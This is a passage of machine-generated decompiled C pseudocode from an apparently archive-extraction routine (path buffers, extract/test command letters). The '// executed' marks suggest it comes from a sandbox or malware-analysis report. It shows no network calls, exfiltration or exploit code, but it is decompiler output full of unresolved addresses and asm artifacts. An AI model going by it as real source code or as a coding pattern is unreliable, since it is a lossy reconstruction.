    												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
    												return _t393;
    											}
    											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
    											_t85 = _t706 - 0x113c; // -2364
    											E00838147(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
    											__eflags =  *(_t706 + 0xb);
    											if( *(_t706 + 0xb) != 0) {
    												L50:
    												 *(_t706 + 0xf) = 0;
    												L51:
    												_t398 =  *(_t683 + 8);
    												_t589 = 0x45;
    												__eflags =  *((char*)(_t398 + 0x6153));
    												_t668 = 0x58;
    												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
    												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
    												if( *((char*)(_t398 + 0x6153)) != 0) {
    													L53:
    													__eflags = _t692 - _t589;
    													if(_t692 == _t589) {
    														L55:
    														_t96 = _t706 - 0x31a8; // -10664
    														E00836FEC(_t96);
    														_push(0);
    														_t97 = _t706 - 0x31a8; // -10664
    														_t403 = E0083A255(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
    														__eflags = _t403;
    														if(_t403 == 0) {
    															_t404 =  *(_t683 + 8);
    															__eflags =  *((char*)(_t404 + 0x6153));
    															_t108 = _t706 + 0xf;
    															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
    															__eflags =  *_t108;
    															L61:
    															_t110 = _t706 - 0x113c; // -2364
    															_t408 = E00837C7E(_t110, _t574, _t110);
    															__eflags = _t408;
    															if(_t408 != 0) {
    																while(1) {
    																	__eflags =  *((char*)(_t574 + 0x331b));
    																	if( *((char*)(_t574 + 0x331b)) == 0) {
    																		goto L65;
    																	}
    																	_t115 = _t706 - 0x113c; // -2364
    																	_t541 = E00838113(_t683, _t574);
    																	__eflags = _t541;
    																	if(_t541 == 0) {
    																		 *((char*)(_t683 + 0x20f6)) = 1;
    																		goto L219;
    																	}
    																	L65:
    																	_t117 = _t706 - 0x13c; // 0x6c4
    																	_t592 = 0x40;
    																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
    																	_t710 = _t708 + 0xc;
    																	asm("movsw");
    																	_t120 = _t706 - 0x2c; // 0x7d4
    																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
    																	 *(_t706 - 4) = 0;
    																	asm("sbb ecx, ecx");
    																	_t127 = _t706 - 0x13c; // 0x6c4
    																	E0083C6D1(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
    																	__eflags =  *((char*)(_t574 + 0x331b));
    																	if( *((char*)(_t574 + 0x331b)) == 0) {
    																		L73:
    																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
    																		_t146 = _t706 - 0x13c; // 0x6c4
    																		L0083E75A(_t146);
    																		_t147 = _t706 - 0x2160; // -6496
    																		E008394D4(_t147);
    																		_t418 =  *(_t574 + 0x3380);
    																		 *(_t706 - 4) = 1;
    																		 *(_t706 - 0x24) = _t418;
    																		_t670 = 0x50;
    																		__eflags = _t418;
    																		if(_t418 == 0) {
    																			L83:
    																			_t419 = E008320F0(_t574);
    																			__eflags = _t419;
    																			if(_t419 == 0) {
    																				_t601 =  *(_t706 + 0xf);
    																				__eflags = _t601;
    																				if(_t601 == 0) {
    																					_t696 =  *(_t706 - 0x18);
    																					L96:
    																					__eflags =  *((char*)(_t574 + 0x6cb4));
    																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
    																						__eflags = _t601;
    																						if(_t601 == 0) {
    																							L212:
    																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
    																							_t358 = _t706 - 0x2160; // -6496
    																							E00839506(_t358);
    																							__eflags =  *(_t706 - 0x10);
    																							_t385 =  *(_t706 + 0xf);
    																							_t671 =  *(_t706 + 0xb);
    																							if( *(_t706 - 0x10) != 0) {
    																								_t362 = _t683 + 0xec;
    																								 *_t362 =  *(_t683 + 0xec) + 1;
    																								__eflags =  *_t362;
    																							}
    																							L214:
    																							__eflags =  *((char*)(_t683 + 0x60));
    																							if( *((char*)(_t683 + 0x60)) != 0) {
    																								goto L219;
    																							}
    																							__eflags = _t385;
    																							if(_t385 != 0) {
    																								L15:
    																								_t393 = 1;
    																								goto L16;
    																							}
    																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
    																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
    																								__eflags = _t671;
    																								if(_t671 != 0) {
    																									goto L15;
    																								}
    																								goto L219;
    																							}
    																							L217:
    																							E00831E8B(_t574);
    																							goto L15;
    																						}
    																						L101:
    																						_t422 =  *(_t683 + 8);
    																						__eflags =  *((char*)(_t422 + 0x61f9));
    																						if( *((char*)(_t422 + 0x61f9)) == 0) {
    																							L103:
    																							_t423 =  *(_t706 + 0xb);
    																							__eflags = _t423;
    																							if(_t423 != 0) {
    																								L108:
    																								 *((char*)(_t706 - 0xf)) = 1;
    																								__eflags = _t423;
    																								if(_t423 != 0) {
    																									L110:
    																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
    																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
    																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
    																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
    																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
    																									E0083A7CC(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8))); // executed
    																									E0083A7CC(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
    																									_t698 = _t683 + 0x10;
    																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
    																									_t217 = _t706 - 0x2160; // -6496
    																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
    																									E0083C719(_t698, _t574, _t217);
    																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
    																									_t608 = 0;
    																									_t432 =  *(_t706 + 0xb);
    																									 *((char*)(_t683 + 0x39)) = _t672;
    																									 *((char*)(_t683 + 0x3a)) = _t432;
    																									 *(_t706 - 0x1c) = 0;
    																									 *(_t706 - 0x28) = 0;
    																									__eflags = _t672;
    																									if(_t672 != 0) {
    																										L127:
    																										_t673 =  *(_t683 + 8);
    																										__eflags =  *((char*)(_t673 + 0x6198));
    																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
    																										__eflags =  *((char*)(_t706 - 0xf));
    																										if( *((char*)(_t706 - 0xf)) != 0) {
    																											L131:
    																											_t434 = 1;
    																											__eflags = 1;
    																											L132:
    																											__eflags =  *(_t706 - 0x24);
    																											 *((char*)(_t706 - 0xe)) = _t608;
    																											 *((char*)(_t706 - 0x12)) = _t434;
    																											 *((char*)(_t706 - 0xd)) = _t434;
    																											if( *(_t706 - 0x24) == 0) {
    																												__eflags =  *(_t574 + 0x3318);
    																												if( *(_t574 + 0x3318) == 0) {
    																													__eflags =  *((char*)(_t574 + 0x22a0));
    																													if(__eflags != 0) {
    																														E008428B5(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
    																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
    																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
    																														__eflags = 0;
    																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
    																														 *((char*)(_t472 + 0x4c60)) = 0;
    																														E0084254C( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
    																													} else {
    																														_push( *(_t574 + 0x32e4));
    																														_push( *(_t574 + 0x32e0));
    																														_push(_t698);
    																														E008391A3(_t574, _t608, _t673, _t683, __eflags);
    																													}
    																												}
    																												L163:
    																												E00831E8B(_t574);
    																												__eflags =  *((char*)(_t574 + 0x3319));
    																												if( *((char*)(_t574 + 0x3319)) != 0) {
    																													L166:
    																													_t436 = 0;
    																													__eflags = 0;
    																													_t610 = 0;
    																													L167:
    																													__eflags =  *(_t574 + 0x3370);
    																													if( *(_t574 + 0x3370) != 0) {
    																														__eflags =  *((char*)(_t574 + 0x22a0));
    																														if( *((char*)(_t574 + 0x22a0)) == 0) {
    																															L175:
    																															__eflags =  *(_t706 + 0xb);
    																															 *((char*)(_t706 - 0xe)) = _t436;
    																															if( *(_t706 + 0xb) != 0) {
    																																L185:
    																																__eflags =  *(_t706 - 0x24);
    																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
    																																if( *(_t706 - 0x24) == 0) {
    																																	L189:
    																																	_t611 = 0;
    																																	__eflags = 0;
    																																	L190:
    																																	__eflags =  *((char*)(_t706 - 0xf));
    																																	if( *((char*)(_t706 - 0xf)) != 0) {
    																																		goto L212;
    																																	}
    																																	_t699 =  *(_t706 - 0x18);
    																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
    																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
    																																		L193:
    																																		__eflags =  *(_t706 - 0x24);
    																																		if( *(_t706 - 0x24) == 0) {
    																																			L197:
    																																			__eflags = _t436;
    																																			if(_t436 == 0) {
    																																				L200:
    																																				__eflags = _t611;
    																																				if(_t611 != 0) {
    																																					L208:
    																																					_t437 =  *(_t683 + 8);
    																																					__eflags =  *((char*)(_t437 + 0x61a0));
    																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
    																																						_t700 = _t683 + 0x10f6;
    																																						_t438 = E0083A1D3(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
    																																						__eflags = _t438;
    																																						if(__eflags == 0) {
    																																							E00831F29(__eflags, 0x11, _t574 + 0x1e, _t700);
    																																						}
    																																					}
    																																					 *(_t683 + 0x10f5) = 1;
    																																					goto L212;
    																																				}
    																																				_t675 =  *(_t706 - 0x28);
    																																				__eflags = _t675;
    																																				_t613 =  *(_t706 - 0x1c);
    																																				if(_t675 > 0) {
    																																					L203:
    																																					__eflags = _t436;
    																																					if(_t436 != 0) {
    																																						L206:
    																																						_t331 = _t706 - 0x2160; // -6496
    																																						E00839C7A(_t331);
    																																						L207:
    																																						_t688 = _t574 + 0x32c0;
    																																						asm("sbb eax, eax");
    																																						asm("sbb ecx, ecx");
    																																						asm("sbb eax, eax");
    																																						_t339 = _t706 - 0x2160; // -6496
    																																						E00839B22(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
    																																						_t340 = _t706 - 0x2160; // -6496
    																																						E00839572(_t340);
    																																						E00837B05( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
    																																						asm("sbb eax, eax");
    																																						asm("sbb eax, eax");
    																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
    																																						E00839B1F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
    																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
    																																						goto L208;
    																																					}
    																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
    																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
    																																						goto L206;
    																																					}
    																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
    																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
    																																						goto L207;
    																																					}
    																																					goto L206;
    																																				}
    																																				__eflags = _t613;
    																																				if(_t613 == 0) {
    																																					goto L207;
    																																				}
    																																				goto L203;
    																																			}
    																																			_t460 =  *(_t683 + 8);
    																																			__eflags =  *((char*)(_t460 + 0x6198));
    																																			if( *((char*)(_t460 + 0x6198)) == 0) {
    																																				goto L212;
    																																			}
    																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
    																																			goto L200;
    																																		}
    																																		__eflags = _t611;
    																																		if(_t611 != 0) {
    																																			goto L197;
    																																		}
    																																		__eflags =  *(_t574 + 0x3380) - 5;
    																																		if( *(_t574 + 0x3380) != 5) {
    																																			goto L212;
    																																		}
    																																		__eflags = _t674;
    																																		if(_t674 == 0) {
    																																			goto L212;
    																																		}
    																																		goto L197;
    																																	}
    																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
    																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
    																																		goto L212;
    																																	}
    																																	goto L193;
    																																}
    																																__eflags =  *(_t574 + 0x3380) - 4;
    																																if( *(_t574 + 0x3380) != 4) {
    																																	goto L189;
    																																}
    																																__eflags = _t674;
    																																if(_t674 == 0) {
    																																	goto L189;
    																																}
    																																_t611 = 1;
    																																goto L190;
    																															}
    																															__eflags =  *((char*)(_t706 - 0x12));
    																															if( *((char*)(_t706 - 0x12)) == 0) {
    																																goto L185;
    																															}
    																															__eflags = _t610;
    																															if(_t610 != 0) {
    																																goto L185;
    																															}
    																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
    																															if(__eflags == 0) {
    																																L183:
    																																_t311 = _t706 - 0x113c; // -2364
    																																_push(_t574 + 0x1e);
    																																_push(3);
    																																L184:
    																																E00831F29(__eflags);
    																																 *((char*)(_t706 - 0xe)) = 1;
    																																E00836F18(0x8700e0, 3);
    																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
    																																goto L185;
    																															}
    																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
    																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
    																																L181:
    																																__eflags =  *((char*)(_t683 + 0xf3));
    																																if(__eflags != 0) {
    																																	goto L183;
    																																}
    																																_t309 = _t706 - 0x113c; // -2364
    																																_push(_t574 + 0x1e);
    																																_push(4);
    																																goto L184;
    																															}
    																															__eflags =  *(_t574 + 0x6cc4) - _t610;
    																															if(__eflags == 0) {
    																																goto L183;
    																															}
    																															goto L181;
    																														}
    																														__eflags =  *(_t574 + 0x32e4) - _t436;
    																														if(__eflags < 0) {
    																															goto L175;
    																														}
    																														if(__eflags > 0) {
    																															L173:
    																															__eflags = _t610;
    																															if(_t610 != 0) {
    																																 *((char*)(_t683 + 0xf3)) = 1;
    																															}
    																															goto L175;
    																														}
    																														__eflags =  *(_t574 + 0x32e0) - _t436;
    																														if( *(_t574 + 0x32e0) <= _t436) {
    																															goto L175;
    																														}
    																														goto L173;
    																													}
    																													 *((char*)(_t683 + 0xf3)) = _t436;
    																													goto L175;
    																												}
    																												asm("sbb edx, edx");
    																												_t469 = E0083A79A(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
    																												__eflags = _t469;
    																												if(_t469 == 0) {
    																													goto L166;
    																												}
    																												_t610 = 1;
    																												_t436 = 0;
    																												goto L167;
    																											}
    																											_t702 =  *(_t574 + 0x3380);
    																											__eflags = _t702 - 4;
    																											if(__eflags == 0) {
    																												L146:
    																												_t262 = _t706 - 0x41a8; // -14760
    																												E00838147(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
    																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
    																												__eflags = _t608;
    																												if(_t608 == 0) {
    																													L153:
    																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
    																													L154:
    																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
    																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
    																														L141:
    																														__eflags = _t608;
    																														if(_t608 == 0) {
    																															L157:
    																															_t480 = 0;
    																															__eflags = 0;
    																															L158:
    																															 *(_t683 + 0x10f5) = _t480;
    																															goto L163;
    																														}
    																														L142:
    																														__eflags = _t479;
    																														if(_t479 == 0) {
    																															goto L157;
    																														}
    																														_t480 = 1;
    																														goto L158;
    																													}
    																													__eflags = _t608;
    																													if(_t608 != 0) {
    																														goto L142;
    																													}
    																													L140:
    																													 *((char*)(_t706 - 0x12)) = 0;
    																													goto L141;
    																												}
    																												__eflags =  *((short*)(_t706 - 0x41a8));
    																												if( *((short*)(_t706 - 0x41a8)) == 0) {
    																													goto L153;
    																												}
    																												_t266 = _t706 - 0x41a8; // -14760
    																												_push(0x800);
    																												_push(_t683 + 0x10f6);
    																												__eflags = _t702 - 4;
    																												if(__eflags != 0) {
    																													_push(_t574 + 0x1e);
    																													_t269 = _t706 - 0x2160; // -6496
    																													_t479 = E008390E1(_t683, _t673, __eflags);
    																												} else {
    																													_t479 = E008375D0(_t608, __eflags);
    																												}
    																												L151:
    																												 *((char*)(_t706 - 0xd)) = _t479;
    																												__eflags = _t479;
    																												if(_t479 == 0) {
    																													L139:
    																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
    																													goto L140;
    																												}
    																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
    																												goto L154;
    																											}
    																											__eflags = _t702 - 5;
    																											if(__eflags == 0) {
    																												goto L146;
    																											}
    																											__eflags = _t702 - _t434;
    																											if(_t702 == _t434) {
    																												L144:
    																												__eflags = _t608;
    																												if(_t608 == 0) {
    																													goto L153;
    																												}
    																												_push(_t683 + 0x10f6);
    																												_t479 = E0083783F(_t673, _t683 + 0x10, _t574);
    																												goto L151;
    																											}
    																											__eflags = _t702 - 2;
    																											if(_t702 == 2) {
    																												goto L144;
    																											}
    																											__eflags = _t702 - 3;
    																											if(__eflags == 0) {
    																												goto L144;
    																											}
    																											E00831F29(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
    																											__eflags = 0;
    																											_t479 = 0;
    																											 *((char*)(_t706 - 0xd)) = 0;
    																											goto L139;
    																										}
    																										__eflags = _t432;
    																										if(_t432 != 0) {
    																											goto L131;
    																										}
    																										_t491 = 0x50;
    																										__eflags =  *(_t706 - 0x18) - _t491;
    																										if( *(_t706 - 0x18) == _t491) {
    																											goto L131;
    																										}
    																										_t434 = 1;
    																										_t608 = 1;
    																										goto L132;
    																									}
    																									__eflags =  *(_t574 + 0x6cc4);
    																									if( *(_t574 + 0x6cc4) != 0) {
    																										goto L127;
    																									}
    																									_t703 =  *(_t574 + 0x32e4);
    																									_t681 =  *(_t574 + 0x32e0);
    																									__eflags = _t703;
    																									if(__eflags < 0) {
    																										L126:
    																										_t698 = _t683 + 0x10;
    																										goto L127;
    																									}
    																									if(__eflags > 0) {
    																										L115:
    																										_t631 =  *(_t574 + 0x32d8);
    																										_t632 = _t631 << 0xa;
    																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
    																										if(__eflags < 0) {
    																											L125:
    																											_t432 =  *(_t706 + 0xb);
    																											_t608 = 0;
    																											__eflags = 0;
    																											goto L126;
    																										}
    																										if(__eflags > 0) {
    																											L118:
    																											__eflags = _t703;
    																											if(__eflags < 0) {
    																												L124:
    																												_t237 = _t706 - 0x2160; // -6496
    																												E00839979(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
    																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
    																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
    																												goto L125;
    																											}
    																											if(__eflags > 0) {
    																												L121:
    																												_t499 = E00839779(_t574, _t681);
    																												__eflags = _t681 -  *(_t574 + 0x32dc);
    																												if(__eflags < 0) {
    																													goto L125;
    																												}
    																												if(__eflags > 0) {
    																													goto L124;
    																												}
    																												__eflags = _t499 -  *(_t574 + 0x32d8);
    																												if(_t499 <=  *(_t574 + 0x32d8)) {
    																													goto L125;
    																												}
    																												goto L124;
    																											}
    																											__eflags = _t681 - 0x5f5e100;
    																											if(_t681 < 0x5f5e100) {
    																												goto L124;
    																											}
    																											goto L121;
    																										}
    																										__eflags = _t632 - _t681;
    																										if(_t632 <= _t681) {
    																											goto L125;
    																										}
    																										goto L118;
    																									}
    																									__eflags = _t681 - 0xf4240;
    																									if(_t681 <= 0xf4240) {
    																										goto L126;
    																									}
    																									goto L115;
    																								}
    																								L109:
    																								_t198 = _t683 + 0xe4;
    																								 *_t198 =  *(_t683 + 0xe4) + 1;
    																								__eflags =  *_t198;
    																								goto L110;
    																							}
    																							 *((char*)(_t706 - 0xf)) = 0;
    																							_t501 = 0x50;
    																							__eflags = _t696 - _t501;
    																							if(_t696 != _t501) {
    																								_t192 = _t706 - 0x2160; // -6496
    																								__eflags = E008397E9(_t192);
    																								if(__eflags != 0) {
    																									E00831F29(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
    																									E00836FB0(0x8700e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
    																								}
    																							}
    																							goto L109;
    																						}
    																						 *(_t683 + 0x10f5) = 1;
    																						__eflags =  *((char*)(_t422 + 0x61f9));
    																						if( *((char*)(_t422 + 0x61f9)) != 0) {
    																							_t423 =  *(_t706 + 0xb);
    																							goto L108;
    																						}
    																						goto L103;
    																					}
    																					 *(_t706 + 0xb) = 1;
    																					 *(_t706 + 0xf) = 1;
    																					_t182 = _t706 - 0x113c; // -2364
    																					_t511 = E00841001(_t601, _t182, 0, 0, 1);
    																					__eflags = _t511;
    																					if(_t511 != 0) {
    																						goto L101;
    																					}
    																					__eflags = 0;
    																					 *(_t706 - 0x1c) = 0;
    																					L99:
    																					_t184 = _t706 - 0x2160; // -6496
    																					E00839506(_t184);
    																					_t393 =  *(_t706 - 0x1c);
    																					goto L16;
    																				}
    																				_t174 = _t706 - 0x2160; // -6496
    																				_push(_t574);
    																				_t515 = E00837FF5(_t683);
    																				_t696 =  *(_t706 - 0x18);
    																				_t601 = _t515;
    																				 *(_t706 + 0xf) = _t601;
    																				L93:
    																				__eflags = _t601;
    																				if(_t601 != 0) {
    																					goto L101;
    																				}
    																				goto L96;
    																			}
    																			__eflags =  *(_t706 + 0xf);
    																			if( *(_t706 + 0xf) != 0) {
    																				_t516 =  *(_t706 - 0x18);
    																				__eflags = _t516 - 0x50;
    																				if(_t516 != 0x50) {
    																					_t639 = 0x49;
    																					__eflags = _t516 - _t639;
    																					if(_t516 != _t639) {
    																						_t640 = 0x45;
    																						__eflags = _t516 - _t640;
    																						if(_t516 != _t640) {
    																							_t517 =  *(_t683 + 8);
    																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
    																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
    																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
    																								_t172 = _t706 - 0x113c; // -2364
    																								_push(_t574);
    																								E00837E31(_t683);
    																							}
    																						}
    																					}
    																				}
    																			}
    																			goto L99;
    																		}
    																		__eflags = _t418 - 5;
    																		if(_t418 == 5) {
    																			goto L83;
    																		}
    																		_t601 =  *(_t706 + 0xf);
    																		_t696 =  *(_t706 - 0x18);
    																		__eflags = _t601;
    																		if(_t601 == 0) {
    																			goto L96;
    																		}
    																		__eflags = _t696 - _t670;
    																		if(_t696 == _t670) {
    																			goto L93;
    																		}
    																		_t520 =  *(_t683 + 8);
    																		__eflags =  *((char*)(_t520 + 0x61f9));
    																		if( *((char*)(_t520 + 0x61f9)) != 0) {
    																			goto L93;
    																		}
    																		 *((char*)(_t706 - 0xf)) = 0;
    																		_t523 = E00839F0F(_t683 + 0x10f6);
    																		__eflags = _t523;
    																		if(_t523 == 0) {
    																			L81:
    																			__eflags =  *((char*)(_t706 - 0xf));
    																			if( *((char*)(_t706 - 0xf)) == 0) {
    																				_t601 =  *(_t706 + 0xf);
    																				goto L93;
    																			}
    																			L82:
    																			_t601 = 0;
    																			 *(_t706 + 0xf) = 0;
    																			goto L93;
    																		}
    																		__eflags =  *((char*)(_t706 - 0xf));
    																		if( *((char*)(_t706 - 0xf)) != 0) {
    																			goto L82;
    																		}
    																		__eflags = 0;
    																		_push(0);
    																		_push(_t574 + 0x32c0);
    																		_t160 = _t706 - 0xf; // 0x7f1
    																		E00839234(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
    																		goto L81;
    																	}
    																	__eflags =  *((char*)(_t574 + 0x3341));
    																	if( *((char*)(_t574 + 0x3341)) == 0) {
    																		goto L73;
    																	}
    																	_t132 = _t706 - 0x2c; // 0x7d4
    																	_t531 = E0084F3CA(_t574 + 0x3342, _t132, 8);
    																	_t708 = _t710 + 0xc;
    																	__eflags = _t531;
    																	if(_t531 == 0) {
    																		goto L73;
    																	}
    																	__eflags =  *(_t574 + 0x6cc4);
    																	if( *(_t574 + 0x6cc4) != 0) {
    																		goto L73;
    																	}
    																	__eflags =  *((char*)(_t683 + 0x10f4));
    																	_t136 = _t706 - 0x113c; // -2364
    																	_push(_t574 + 0x1e);
    																	if(__eflags != 0) {
    																		_push(6);
    																		E00831F29(__eflags);
    																		E00836F18(0x8700e0, 0xb);
    																		__eflags = 0;
    																		 *(_t706 + 0xf) = 0;
    																		goto L73;
    																	}
    																	_push(0x7c);
    																	E00831F29(__eflags);
    																	E0083E7CD( *(_t683 + 8) + 0x5024);
    																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
    																	_t141 = _t706 - 0x13c; // 0x6c4
    																	L0083E75A(_t141);
    																}
    															}
    															E00836F18(0x8700e0, 2);
    															_t543 = E00831E8B(_t574);
    															__eflags =  *((char*)(_t574 + 0x6cb4));
    															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
    															goto L16;
    														}
    														_t100 = _t706 - 0x2198; // -6552
    														_t545 = E00837C57(_t100, _t574 + 0x32c0);
    														__eflags = _t545;
    														if(_t545 == 0) {
    															goto L61;
    														}
    														__eflags =  *((char*)(_t706 - 0x219c));
    														if( *((char*)(_t706 - 0x219c)) == 0) {
    															L59:
    															 *(_t706 + 0xf) = 0;
    															goto L61;
    														}
    														_t102 = _t706 - 0x2198; // -6552
    														_t547 = E00837C39(_t102, _t683);
    														__eflags = _t547;
    														if(_t547 == 0) {
    															goto L61;
    														}
    														goto L59;
    													}
    													__eflags = _t692 - _t668;
    													if(_t692 != _t668) {
    														goto L61;
    													}
    													goto L55;
    												}
    												__eflags =  *((char*)(_t398 + 0x6154));
    												if( *((char*)(_t398 + 0x6154)) == 0) {
    													goto L61;
    												}
    												goto L53;
    											}
    											__eflags =  *(_t683 + 0x10f6);
    											if( *(_t683 + 0x10f6) == 0) {
    												goto L50;
    											}
    											 *(_t706 + 0xf) = 1;
    											__eflags =  *(_t574 + 0x3318);
    											if( *(_t574 + 0x3318) == 0) {
    												goto L51;
    											}
    											goto L50;
    										}
    										__eflags = _t692 - _t387;
    										_t388 = 1;
    										if(_t692 != _t387) {
    											goto L46;
    										}
    										goto L45;
    									}
    									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
    									 *(_t706 + 0xb) = _t671;
    									 *(_t706 + 0xc) = _t671;
    									__eflags = _t671;
    									if(_t671 == 0) {
    										goto L214;
    									} else {
    										_t667 = 0;
    										__eflags = 0;
    										goto L43;
    									}
    								}
    								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
    								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
    									goto L29;
    								}
    								__eflags =  *((char*)(_t683 + 0xf1));
    								if( *((char*)(_t683 + 0xf1)) != 0) {
    									goto L219;
    								}
    								goto L29;
    							}
    							if(__eflags < 0) {
    								L25:
    								 *(_t574 + 0x32e0) = _t665;
    								 *(_t574 + 0x32e4) = _t665;
    								goto L26;
    							}
    							__eflags =  *(_t574 + 0x32e0) - _t665;
    							if( *(_t574 + 0x32e0) >= _t665) {
    								goto L26;
    							}
    							goto L25;
    						}
    						if(__eflags < 0) {
    							L21:
    							 *(_t574 + 0x32d8) = _t665;
    							 *(_t574 + 0x32dc) = _t665;
    							goto L22;
    						}
    						__eflags =  *(_t574 + 0x32d8) - _t665;
    						if( *(_t574 + 0x32d8) >= _t665) {
    							goto L22;
    						}
    						goto L21;
    					}
    					__eflags = _t690 - 3;
    					if(_t690 != 3) {
    						L10:
    						__eflags = _t690 - 5;
    						if(_t690 != 5) {
    							goto L217;
    						}
    						__eflags =  *((char*)(_t574 + 0x45ac));
    						if( *((char*)(_t574 + 0x45ac)) == 0) {
    							goto L219;
    						}
    						_push( *(_t706 - 0x18));
    						_push(0);
    						_push(_t683 + 0x10);
    						_push(_t574);
    						_t564 = E00848143(_t665);
    						__eflags = _t564;
    						if(_t564 != 0) {
    							__eflags = 0;
    							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
    							goto L15;
    						} else {
    							E00836F18(0x8700e0, 1);
    							goto L219;
    						}
    					}
    					__eflags =  *(_t683 + 0x10f5);
    					if( *(_t683 + 0x10f5) == 0) {
    						goto L217;
    					} else {
    						E00837A9A(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
